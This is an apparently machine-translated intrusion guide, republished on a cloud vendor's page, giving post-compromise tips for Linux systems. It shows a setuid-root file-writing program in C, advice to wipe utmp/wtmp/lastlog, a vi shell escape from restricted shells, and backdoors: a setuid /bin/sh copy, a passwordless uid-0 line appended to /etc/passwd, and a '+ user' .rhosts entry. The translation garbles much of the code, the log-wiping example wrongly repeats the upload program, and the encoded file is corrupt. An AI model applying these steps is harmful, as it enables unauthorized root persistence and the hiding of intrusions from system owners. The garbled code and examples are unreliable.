Common linux intrusion tips

Source: Internet
Author: User
After the 1UPLOAD intrusion is successful, you get the root permission. In this case, you can change the access permission of his server so that anyone can upload files! In the root state, after running Install, upload allows normal users to upload files to any directory. # Chmod755install #. install $ Content $ nbsp; mo

1 UPLOAD
After the intrusion is successful, you get the root permission. This can change the access permission of his server so that anyone can upload files!
In the root state, after the Install command is run,
The upload allows the user to upload the file to any directory.
 

  1. #Chmod755 install
  2. #./Install
  3. $ Content $ nbsp;MoreInstall
  4. #! /Bin/csh-f
  5. Cc upload. c
  6. CpA. out upload
  7. ChownRoot upload
  8. Chmod 755 upload
  9. Chmod u + s upload
  10. $ Content $ nbsp; more upload. c

 

  1. # INcLude
  2. Main ()
  3. {
  4. CharFileName [48];
  5. Printf ("This program will upload up.txt ASCII file to specifiEdFile \ n ");
  6. Printf ("XXX Copyright Reserved \ n ");
  7. Printf ("Where to upload (include path and filename )? ");
  8. Gets (filename );
  9. Upload (filename );
  10. }
  11. Int upload (filename)
  12. Char * filename;
  13. {
  14. FILE * fp, * outp;
  15. Char c;
  16. Fp = fopen ("up.txt", "r ");
  17. Outp = fopen (filename, "w ");
  18. If (fp = NULL ){
  19. Printf ("file notExIst .");
  20. Return 0;
  21. }
  22. For (;;){
  23. C = fgetc (fp );
  24. If feof (fp) break;
  25. Printf ("% c", c );
  26. Fputc (c, outp );
  27. }
  28. Fclose (fp );
  29. Fclose (outp );
  30. Return 1;
  31. }
  32.  

2 destruction site
After entering the system, how can the site be damaged before it comes out? Erase your footprints?

Edit/etc/utmp,/usr/adm/wtmp and/usr/adm/lastlog.
Please use a dedicated editor

Example:

  1. # Include
  2. Main ()
  3. {
  4. Char filename [48];
  5. Printf ("This program will upload up.txt ASCII file to specified file \ n ");
  6. Printf ("XXX Copyright Reserved \ n ");
  7. Printf ("Where to upload (include path and filename )? ");
  8. Gets (filename );
  9. Upload (filename );
  10. }
  11. Int upload (filename)
  12. Char * filename;
  13. {
  14. FILE * fp, * outp;
  15. Char c;
  16. Fp = fopen ("up.txt", "r ");
  17. Outp = fopen (filename, "w ");
  18. If (fp = NULL ){
  19. Printf ("file not exist .");
  20. Return 0;
  21. }
  22. For (;;){
  23. C = fgetc (fp );
  24. If feof (fp) break;
  25. Printf ("% c", c );
  26. Fputc (c, outp );
  27. }
  28. Fclose (fp );
  29. Fclose (outp );
  30. Return 1;
  31. }

 

3. SHELL breakthrough
Many methods to attack the system require the attacker to first haveCommandLine Shell, such as/bin/csh. However, some systems provide you with a menu-style custom Shell, such as pink. So if you want to attack this system, you must first break through this custom shell.


We can use some commands of vi (Standard editor in UNIX) to achieve this goal. The specific process is as follows:
(1) select edit file in the Custom Shell, then the system starts vi.
(2) In vi, enter the following command sequence: (Note: The input command includes the first ':')
:SetShell =/bin/csh
: Shell


3. at this time, just like selecting the DOS Shell menu item in the File menu of the Dos program, the system starts a Shell, which was just set to/bin/csh, therefore, we get a command-line Unix Shell.

 

 

4 Backdoor
It is a good habit to leave a backdoor after entering a system :) here are some simple backdoor settings:
(1). setuId
# Cp/bin/sh/tmp/. backdoor
# Chmod u + s/tmp/. backdoor
AddSuIt is the easiest and most convenient to store the id in shell.
(2). echo "wyj: 0: 0:/bin/csh">/etc/Passwd
Add an account with the id 0 (root) to the system without a password.
(3). echo "+ wyj">/. rhosts
That is to say, the local user named wyj can directly rlogin target without a password. At this time, wyj is equivalent to a password, and people who do not know can't enter it. The premise is that the target port 512or513or514 opening.

 

5 Use teLnEt uploads files
IfFtpIf sendmail is disabled, it cannot be used. How can I upload compiled files to the host?
The method is simple:
1. encode the file to be uploaded with uuedcode. The file will look like the following:
Begin 644 file. bat
M. C! J95 @ T92TP, # 503U! =: % = E6 #5D9%!>, 2Q & 1D9 & 1C $ L1D9 &, 2PT 4%] J
M95 @ T85! 9 + 7 @ M04 % 28 #! @ * CTP, '500d]) 04%! 049 + 04] "4 $ E $34-" 04Q % 04I-
M3D-"2D %, 24%! 14U-3D-"1D5 '24 = & 0 T % 3D =" 1T1 (0 T = 02 $ = '2da #2 $9 (1 $ -!
M1TI (1 $ -! 1T1 '4 $ =. 1ti' 3 T = (0 T % #3 T-/0 T] #3 T-/0 T]! 3D % + 0T5! 07% Q <7 $ @
M "D! % 0TA/($] & 1B '* 0 T] 062 'E, "Y" 050 @ + T (@ 0SI <0D % 45DE2 + D-/32 'o0b' O
E62 '* 0SI <0D % 45DE2 + D-/32' * 1 $5, ($, Z7 $ )! 5% 9) 4BY # 3TT @"@''
'
End
Sum-r/size 17903/262
All are visible ASCII characters.


2. Connect to the host using TELNET and enter
$ Content $ nbsp;Cat>
Then copy/paste the file to WINODWSTelnetWindow
Press ^ d
Generate file a in the current directory


3. uudecode
Restore the file, and then run chmod.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.